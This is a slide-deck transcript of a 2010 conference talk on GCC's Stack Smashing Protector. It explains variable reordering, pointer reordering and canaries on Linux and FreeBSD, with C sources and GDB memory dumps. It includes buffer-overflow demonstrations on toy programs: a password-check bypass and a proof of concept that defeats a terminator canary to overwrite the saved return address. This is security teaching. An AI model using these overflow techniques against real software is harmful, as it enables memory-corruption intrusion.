SlideShare a Scribd company logo

Stack Smashing Protector (Paul Rascagneres)

Hackfest Communication
Hackfest Communication

Depuis FreeBSD 8.0, le SSP est activé automatique pour la compilation de l'OS. Cette option de GCC développée au départ par IBM, permet d'ajouter des mécanismes de protection face aux buffer overflows. La présentation sera accompagnée de sources C et d'étude de la mémoire via GDB. La présentation commencera par le fonctionnement du SSP (via 3 aspects), suivi de l'implémentation sous FreeBSD et son Linux pour finir par l'exploitation dans certains cas de figure.

Technology
1 of 47
Stack Smashing Protector Stack Smashing Protector 06/11/2010 /* * ---------------------------------------------------------------------------- * "THE BEER-WARE LICENSE" (Revision 42): * <rootbsd@r00ted.com> wrote this file. As long as you retain this notice you * can do whatever you want with this stuff. If we meet some day, and you think * this stuff worth it, you can buy me a beer in return Paul Rascagneres. * ---------------------------------------------------------------------------- */ Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware - HACKFEST
Stack Smashing Protector Contents 1. Introduction 2. Local variables reordering 3. Pointers reordering 4. Canary 4.1 What is it? How does it work? 4.2 Linux integration 4.3 FreeBSD integration 5. Exploitation with “Terminator” mode Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 1. Introduction - GCC extension - To protect from stack smashing attacks - IBM - Developed since 2005 The protection is realized by : - local variables reordering - copying the pointers in function before local variable - canary insertion Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 2. Local variables reordering Example of code : void check_password(char *pass) { int good=0; char password[10]; strcpy(password,pass); if (!strcmp(password,"passw0rd")) good=1; if ( good == 1 ) printf("Password OKn"); else printf("Password KOn"); } int main(int argc, char **argv) { if (argc != 2) return(1); check_password(argv[1]); } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 2. Local variables reordering Compilation without SSP : $ gcc -g code1.c -o code1 $ gdb ./code1 (gdb) break 10 Breakpoint 1 at 0x8048423: file code1.c, line 10. (gdb) run AAAAAA Starting program: /root/pres/code1 AAAAAA Breakpoint 1, check_password (pass=0xbffffeab "AAAAAA") at code1.c:10 10 if (!strcmp(password,"passw0rd")) (gdb) x/x &good 0xbffffce4: 0x00000000 (gdb) x/x password 0xbffffcda: 0x41414141 (gdb) x/12x $esp 0xbffffcd0: 0xbffffcda 0xbffffeab 0x4141fe9a 0x41414141 0xbffffce0: 0xb7f9da00 0x00000000 0xbffffd08 0x0804849f 0xbffffcf0: 0xbffffeab 0x08049688 0xbffffd18 0xbffffd20 Green : password variable and Red : good variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 2. Local variables reordering Variable smashing : $ gdb ./code1 (gdb) break 10 Breakpoint 1 at 0x8048423: file code1.c, line 10. (gdb) run AAAAAAAAAA$(perl -e 'print "x01"') Starting program: /root/pres/code1 AAAAAAAAAA$(perl -e 'print "x01"') Breakpoint 1, check_password (pass=0xbffffeab "AAAAAAAAAA001") at code1.c:10 10 if (!strcmp(password,"passw0rd")) (gdb) x/x &good 0xbffffce4: 0x00000001 (gdb) x/x password 0xbffffcda: 0x41414141 (gdb) x/12x $esp 0xbffffcd0: 0xbffffcda 0xbffffeab 0x4141fe9a 0x41414141 0xbffffce0: 0x41414141 0x00000001 0xbffffd08 0x0804849f 0xbffffcf0: 0xbffffeab 0x08049688 0xbffffd18 0xbffffd20 Green : password variable and Red : good variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 2. Local variables reordering Variable smashing : - we can overwrite the variable and bypass the test $ ./code1 AAAAAA Password KO $ ./code1 passw0rd Password OK $ ./code1 AAAAAAAAAA$(perl -e 'print "x01"') Password OK Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 2. Local variables reordering Compilation with SSP : $ gcc -g -fstack-protector-all code1.c -o code1-ssp $ gdb ./code1-ssp (gdb) break 10 Breakpoint 1 at 0x8048423: file code1.c, line 10. (gdb) run AAAAAA Starting program: /root/pres/code1-ssp AAAAAA Breakpoint 1, check_password (pass=0xbffffeab "AAAAAA") at code1.c:10 10 if (!strcmp(password,"passw0rd")) (gdb) x/x &good 0xbffffcc4: 0x00000000 (gdb) x/x password 0xbffffcca: 0x41414141 (gdb) x/24x $esp 0xbffffca0: 0xbffffcca 0xbffffea7 0x00000000 0x00000000 0xbffffcb0: 0x00000000 0xbffffea7 0x00000000 0x00000000 0xbffffcc0: 0x00000000 0x00000000 0x41410000 0x41414141 0xbffffcd0: 0x00000000 0xff0a0000 0xbffffd08 0x0804852f 0xbffffce0: 0xbffffea7 0x08049728 0xbffffcf8 0xbffffda4 0xbffffcf0: 0x00000002 0x08049728 0xbffffd18 0x08048579 Green : password variable and Red : good variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 2. Local variables reordering With the SSP : - we cannot overwrite the variable and bypass the test - All buffers are above local variable in the stack $ ./code1-ssp AAAAAA Password KO $ ./code1-ssp passw0rd Password OK $ ./code1-ssp AAAAAAAAAA$(perl -e 'print "x01"') Password KO Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 3. Pointers reordering Example of code : void function(char *one, char *two) { char buff[8]; strcpy(buff,one); } int main(int argc, char * argv[]) { function(argv[1],"BBBBBBB"); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 3. Pointers reordering Compilation without SSP - 1/2: $ gcc -g code2.c -o code2 (gdb) run AAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/pres/code2 AAAAAAA Breakpoint 1, function (one=0xbffffeaa "AAAAAAA", two=0x80484c0 "BBBBBBB") at code2.c:5 6 } (gdb) x/24x $esp 0xbffffcd0: 0x00000000 0x00000000 0xbffffe99 0xb7eeffde 0xbffffce0: 0x41414141 0x00414141 0xbffffd08 0x080483e7 0xbffffcf0: 0xbffffeaa 0x080484c0 0xbffffd18 0x08048429 0xbffffd00: 0xb7ff2250 0xbffffd20 0xbffffd78 0xb7e98455 0xbffffd10: 0x08048410 0x080482f0 0xbffffd78 0xb7e98455 0xbffffd20: 0x00000002 0xbffffda4 0xbffffdb0 0xb7fe2b38 Green one pointer, Red two pointer and Blue buff variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 3. Pointers reordering Compilation without SSP - 2/2: $ gcc -g code2.c -o code2 (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/pres/code2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, function (one=0xbffffeaa "Ax39", two=0x80484c0 "BBBBBBB") at code2.c:5 6 } (gdb) x/24x $esp 0xbffffcd0: 0x00000000 0x00000000 0xbffffe99 0xb7eeffde 0xbffffce0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcf0: 0x41414141 0x41414141 0xbffffd18 0x08048429 0xbffffd00: 0xb7ff2250 0xbffffd20 0xbffffd78 0xb7e98455 0xbffffd10: 0x08048410 0x080482f0 0xbffffd78 0xb7e98455 0xbffffd20: 0x00000002 0xbffffda4 0xbffffdb0 0xb7fe2b38 Green one pointer, Red two pointer and Blue buff variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 3. Pointers reordering Pointers smashing : - we can overwrite pointers - we can arbitrary put our own pointers Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 3. Pointers reordering Compilation with SSP : $ gcc -g -fstack-protector-all code2.c -o code2-ssp (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/pres/code2-ssp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, function (one=0xbffffe86 "Ax39", two=0x8048560 "BBBBBBB") at code2.c:5 6 } (gdb) x/24x $esp 0xbffffc90: 0xbffffcac 0xbffffe86 0x00000000 0x00000000 0xbffffca0: 0x08048560 0xbffffe86 0x00000000 0x41414141 0xbffffcb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcc0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcd0: 0x00414141 0x08049654 0xbffffcf8 0x080484c9 0xbffffce0: 0xff0a0000 0xbffffd00 0xbffffd58 0xb7e98455 Green one pointer, Red two pointer and Blue buff variable Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 3. Pointers reordering With the SSP : - we cannot overwrite pointers - argument pointers are below variables Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? - canary is between local variable and saved EBP - if the canary is corrupted : the binary is brutally stopped ------------------------ | saved EIP | ------------------------ | saved EBP | ------------------------ | canary | ------------------------ | local variables | ------------------------ Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? 3 kinds of canary : - random - terminator (0xff0a0000) - null (0x00000000) Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? Get the canary (x86 only): $ cat get_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? Get the canary : $ cat get_canary.c $ gcc -g -fstack-protector-all get_canary.c -o get_canary $ ./get_canary AAAAAAAAA Canary = 0xff0a0000 Canary in terminator mode (gdb) run AAAAAAA Starting program: /root/pres/get_canary AAAAAAA Breakpoint 1, fun (arg=0xbffffea5 "AAAAAAA") at get_canary.c:8 8 printf("Canary = 0x"); (gdb) x/24x $esp 0xbffffc90: 0xbffffcba 0xbffffea5 0x00000000 0x00000000 0xbffffca0: 0x00000000 0xbffffea5 0x00000000 0x00000000 0xbffffcb0: 0x00000000 0x00000000 0x41410000 0x41414141 0xbffffcc0: 0x00000041 0xff0a0000 0xbffffcf8 0x08048526 0xbffffcd0: 0xbffffea5 0x08049710 0xbffffce8 0xbffffd94 0xbffffce0: 0x00000002 0x08049710 0xbffffd08 0x08048579 Green variable b, Red canary, Blue saved EBP and Pink saved EIP Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? What's happen if the canary is overwritten : (gdb) run AAAAAAAAAAAAA Starting program: /root/pres/get_canary AAAAAAAAAAAAAAAAAAAAA Breakpoint 1, fun (arg=0xbffffe9f 'A' <repeats 21 times>) at get_canary.c:8 8 printf("Canary = 0x"); (gdb) x/24x $esp 0xbffffc90: 0xbffffcba 0xbffffe9f 0x00000000 0x00000000 0xbffffca0: 0x00000000 0xbffffe9f 0x00000000 0x00000000 0xbffffcb0: 0x00000000 0x00000000 0x41410000 0x41414141 0xbffffcc0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbffffcd0: 0xbffffe9f 0x08049710 0xbffffce8 0xbffffd94 0xbffffce0: 0x00000002 0x08049710 0xbffffd08 0x08048579 (gdb) cont Continuing. Canary = 0x00414141 *** stack smashing detected ***: /root/pres/get_canary terminated Green variable b, Red canary, Blue saved EBP and Pink saved EIP Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? - If the canary is overwritten or corrupted the binary is brutally stopped - binary doesn't jump to the saved EIP - stack smashing exploitation failed $ ./get_canary AAAAAAAAAAAAAAAAAAAAAAA Canary = 0x41414141 *** stack smashing detected ***: ./get_canary terminated FreeBSD canary type is random : $ ./get_canary AAAA Canary = 0x8fb1bb41 $ ./get_canary AAAA Canary = 0xa4c64939 $ ./get_canary AAAA Canary = 0x035ea454 Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.1. What is it? How does it work? How to know if SSP is active on a binary ? $ readelf -s ./get_canary | grep stack 6: 00000000 32 FUNC GLOBAL DEFAULT UND __stack_chk_fail@GLIBC_2.4 (3) 74: 00000000 32 FUNC GLOBAL DEFAULT UND __stack_chk_fail@@GLIBC_2 $ objdump -s ./get_canary | grep stack 804824c 5f5f7374 61636b5f 63686b5f 6661696c __stack_chk_fail Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration Get the canary (x86 only): $ cat get_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration What are the differences between SSP and no-SSP compilations : $ gcc -fstack-protector-all -g get_canary.c -o get_canary $ ./get_canary AAA Canary = 0x97c593e9 $ ./get_canary AAA Canary = 0x8562009f Random canary $ gcc -fstack-protector-all -g get_canary.c -S $ mv get_canary.s get_canary.SSP.s $ gcc -g get_canary.c -S $ diff get_canary.c get_canary.SSP.s > movl 44(%esp), %edx > xorl %gs:20, %edx > je .L9 > call __stack_chk_fail Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration What does this ASM code mean ? It compares the canary value with register %GS at offset 0x14. If it is not the same it executes : __stack_chk_fail This function stop the binary execution. Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration Code to validate the previous slide : typedef unsigned long can_t; #define can_fmt "%0lx" #define get_canary(can) asm volatile("mov %%gs:(0x14), %0" : "=r" (can)); int fun(char *arg) { int i, char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { can_t can; get_canary(can); printf("Register GS at offset 0x14 : " can_fmt "n", can); if(argc>1) fun(argv[1]); return 0;} Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration Test : $ gcc -fstack-protector-all -g get_canary2.c -o get_canary2 $ ./get_canary2 AA Register GS at offset 0x14 : 305f1b54 Canary = 0x305f1b54 $ ./get_canary2 AA Register GS at offset 0x14 : d9b5db15 Canary = 0xd9b5db15 It works... ... but, how is the register set ?!?! Nothing in the binary ?!?! Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration The register is set by the kernel : $ grep '%%gs' arch/x86/include/asm/stackprotector.h asm volatile (“mov %0, %%gs” : : “r” (0)); How to overwrite register GS and put our own canary ? Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration #define set() asm volatile("mov %0, %%gs:(0x14)" :: "r" (0x41414141)); int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) { set(); fun(argv[1]); } return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration $ ./set_canary AAA Canary = 0x41414141 *** stack smashing detected ***: ./set_canary terminated $ ctf:~/pres# ./set_canary AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Canary = 0x41414141 Segmentation fault We made our own canary. Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. Linux integration Summary : - kernel sets register GS at offset 0x14 - binary saves it between variable and saved EBP - binary runs - binary compares the canary and the register - binary stops its execution if values are not the same Why random canary or terminator canary on Linux ?? - it depends on glibc compilation - terminator by default - random if compiled with –enable-stackguard-randomization Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.2. FreeBSD integration Get the canary (x86 only): $ cat get_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.3. FreeBSD integration Canary is generated by __guard_setup() /usr/src/contrib/gcclibs/libssp/ssp.c => static void __attribute__ ((constructor)) __guard_setup (void); The function creates a static variable with the canary inside Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.3. FreeBSD integration The canary is in the .bss section : $ readelf -a ./get_canary | grep bss [22] .bss NOBITS 080497f8 0007f8 000028 00 WA 0 0 8 .bss address : 0x08497F8 (gdb) break 13 Breakpoint 1 at 0x8048573: file get_canary.c, line 13. (gdb) run AAAA Starting program: get_canary AAAA Canary = 0xae0ea9fd Breakpoint 1, fun (arg=0xbfbfea4e "AAAA") at get_canary.c:13 13 } (gdb) x/10x 0x080497f8 0x80497f8 <__stack_chk_guard@@FBSD_1.0>: 0xae0ea9fd 0xbbbffda5 0xdab8440a 0x349ec6b5 0x8049808 <__stack_chk_guard@@FBSD_1.0+16>: 0x6a82af9f 0xcf2be5cc 0x0d069c6e 0x75ca1bf4 0x8049818 <completed.4782>: 0x00000000 0xbfbfe86c How to set our own canary in .bss section ? Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.3. FreeBSD integration $ cat set_canary.c int fun(char *arg) { int i; char p[10]; strcpy(p,arg); printf("Canary = 0x"); for(i=13;i>9;i--) printf("%02x",(unsigned char)*(p+i)); printf("n"); } int main(int argc,char **argv) { memcpy( (char *)(0x080497f8), “AAAA” , 5); if(argc>1) fun(argv[1]); return 0; } Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.3. FreeBSD integration $ ./set_canary AAAA Canary = 0x41414141 Abort trap: 6 (core dumped) $ ./set_canary AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Canary = 0x41414141 Segmentation fault: 11 (core dumped) Our canary is placed between local variable and the saved EBP Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Canary 4.3. FreeBSD integration Summary : - __guard_setup() initializes canary in .bss section - binary saves it between variable and saved EBP - binary runs - binary compares the canary and the static variable (.bss) - binary stops its execution if values are not the same Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode Code for the poc : int funk(char *one, char *two, char *three) { char var_one[8]; char var_two[8]; char var_three[8]; strcpy(var_one, one); strcpy(var_two, two); strcpy(var_three, three); return(0); } int main(int argc, char *argv[]) { if (argc <4) { printf("Usage: one two threen"); exit(1); } funk(argv[1], argv[2], argv[3]); } $ gcc -g -fstack-protector-all poc.c -o poc Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode (gdb) b 14 (gdb) run `perl -e 'print "AAAAAAA"'` "BBBBBBB" "CCCCCCC" Starting program: ./poc `perl -e 'print "AAAAAAA"'` "BBBBBBB" "CCCCCCC" Breakpoint 1, funk (one=0xbfe86abc "AAAAAAA", two=0xbfe86ac5 "BBBBBBB", three=0xbfe86ace "CCCCCCC") at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbfe859a0: 0xbfe859bc 0xbfe86ace 0x00000000 0xbfe86ace 0xbfe859b0: 0xbfe86ac5 0xbfe86abc 0x00000000 0x43434343 0xbfe859c0: 0x00434343 0x42424242 0x00424242 0x41414141 0xbfe859d0: 0x00414141 0xff0a0000 0xbfe85a08 0x0804853b 0xbfe859e0: 0xbfe86abc 0xbfe86ac5 0xbfe86ace 0x08048334 0xbfe859f0: 0xb7f56ff4 0x08049714 0xbfe85a20 0x08048579 0xbfe85a00: 0xbfe85a20 0xb7f56ff4 0xbfe85a78 0xb7e16455 0xbfe85a10: 0x08048560 0x080483b0 0xbfe85a78 0xb7e16455 Blue three variable, Green two , Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode Overflow test : (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa BBBBBBBBBBBBB CCCCCCCCCCCCCCC Starting program: ./poc AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa BBBBBBBBBBBBB CCCCCCCCCCCCCCC Breakpoint 1, funk (one=0xbf91ca96 'A' <repeats 33 times>, "a", two=0xbf91cab9 'B' <repeats 13 times>, three=0xbf91cac7 'C' <repeats 15 times>) at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbfe859a0: 0xbfe859bc 0xbfe86ace 0x00000000 0xbfe86ace 0xbfe859b0: 0xbfe86ac5 0xbfe86abc 0x00000000 0x43434343 0xbfe859c0: 0x43434343 0x42424200 0x42424242 0x41414141 0xbfe859d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfe859e0: 0x41414141 0x41414141 0xbfe86ace 0x08048334 0xbfe859f0: 0xb7f56ff4 0x08049714 0xbfe85a20 0x08048579 0xbfe85a00: 0xbfe85a20 0xb7f56ff4 0xbfe85a78 0xb7e16455 0xbfe85a10: 0x08048560 0x080483b0 0xbfe85a78 0xb7e16455 (gdb) cont Continuing. *** stack smashing detected ***: ./poc terminated Blue three variable, Green two, Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode Fix the canary : (gdb) run "`perl -e 'print "AAAAAAAA" . "x00x00x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBBB" "CCCCCCCC" Starting program: ./poc "`perl -e 'print "AAAAAAAA" . "x00x00x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBB" "CCCCCCC" Breakpoint 1, funk (one=0xbfe9faad "AAAAAAAAnÿ", 'A' <repeats 13 times>, two=0xbfe9fac5 "BBBBBBBB", three=0xbfe9face "CCCCCCCC") at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x43434343 0xbfe9d8f0: 0x00434343 0x42424242 0x00424242 0x41414141 0xbfe9d900: 0x00414141 0xff0a0000 0xbfe85a08 0x0804853b 0xbfe9d910: 0xbfe86abc 0xbfe9fac5 0xbfe9face 0x08048334 0xbfe9d920: 0xb7f10ff4 0x08049714 0xbfe9d950 0x08048579 0xbfe9d930: 0xbfe9d950 0xb7f10ff4 0xbfe9d9a8 0xb7dd0455 0xbfe9d940: 0x08048560 0x080483b0 0xbfe9d9a8 0xb7dd0455 Blue three variable, Green two, Red one and Pink the canary The saved ESP is not overwritten by 0x41414141 !!!! WTF !?!? Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode - the canary value is not fortuity choice… - strcpy() stop at first x00 and canary is not overwritten - How to bypass it ? With imagination !!! Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode Fix the canary (the good way) : (gdb) run "`perl -e 'print "AAAAAAAAAA" . "x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBBBBBBBBBBBB" "CCCCCCCCCCCCCCCCCCCCCCCC" Starting program: ./poc "`perl -e 'print "AAAAAAAAAA" . "x0axff" . "AAAAAAAAAAAAA"'`" "BBBBBBBBBBBBBBBBB" "CCCCCCCCCCCCCCCCCCCCCCCC" Breakpoint 1, funk (one=0xbf9afa92 "AAAAAAAAAAnÿ", 'A' <repeats 13 times>, two=0xbf9afaac 'B' <repeats 17 times>, three=0xbf9afabe 'C' <repeats 24 times>) at a.c:14 14 return(0); (gdb) x/32xw $esp 0xbf9ade60: 0xbf9ade7c 0xbf9afabe 0x00000000 0xbf9afabe 0xbf9ade70: 0xbf9afaac 0xbf9afa92 0x00000000 0x43434343 0xbf9ade80: 0x43434343 0x43434343 0x43434343 0x43434343 0xbf9ade90: 0x43434343 0xff0a0000 0x41414141 0x41414141 0xbf9adea0: 0x41414141 0xbf9a0041 0xbf9afabe 0x08048334 0xbf9adeb0: 0xb7f9bff4 0x08049714 0xbf9adee0 0x08048579 0xbf9adec0: 0xbf9adee0 0xb7f9bff4 0xbf9adf38 0xb7e5b455 (gdb) cont Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () Blue three variable, Green two, Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode Step by step first strcpy(): (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x00000000 0xbfe9d8f0: 0x00000000 0x00000000 0x00000000 0x41414141 0xbfe9d900: 0x41414141 0xff0a4141 0x41414141 0x41414141 0xbfe9d910: 0x41414141 0xbfe90041 0xbfe9face 0x08048334 Second strcpy() : (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x00000000 0xbfe9d8f0: 0x00000000 0x42424242 0x42424242 0x42424242 0xbfe9d900: 0x42424242 0xff0a0042 0x41414141 0x41414141 0xbfe9d910: 0x41414141 0xbfe90041 0xbfe9face 0x08048334 Last strcpy() : (gdb) x/32xw $esp 0xbfe9d8d0: 0xbfe9d8ec 0xbfe9face 0x00000000 0xbfe9face 0xbfe9d8e0: 0xbfe9fac5 0xbfe9faad 0x00000000 0x43434343 0xbfe9d8f0: 0x43434343 0x43434343 0x43434343 0x43434343 0xbfe9d900: 0x43434343 0xff0a0000 0x41414141 0x41414141 0xbfe9d910: 0x41414141 0xbfe90041 0xbfe9face 0x08048334 Blue three variable, Green two, Red one and Pink the canary Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 4. Exploitation with “Terminator” mode This POC shows that it is possible to overwrite a canary in terminator mode in a specific configuration (and some little tricks ;-) ) Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 5. Real life example Exploit published on May 2010 : http://seclists.org/bugtraq/2010/May/272 FreeBSD kernel NFS client local root FreeBSD 8.x : crash due to SSP FreeBSD 7.x : local root -_- Improper argument validation cause a kernel stack oveflow Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST
Stack Smashing Protector 6. Conclusion & questions Greeting : Thanks to W4kfu for his help : http://w4kfu.com Paul Rascagneres (aka RootBSD) - http://www.r00ted.com - Licensed Beerware – HACKFEST

Recommended

Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練
NTUSTxTDOH 資訊安全基礎工作坊 基礎逆向教育訓練Sheng-Hao Ma
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 
Page table manipulation attack
Page table manipulation attackPage table manipulation attack
Page table manipulation attackJungseung Lee 이정승
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
NTUSTxTDOH - Pwn基礎 2015/12/27
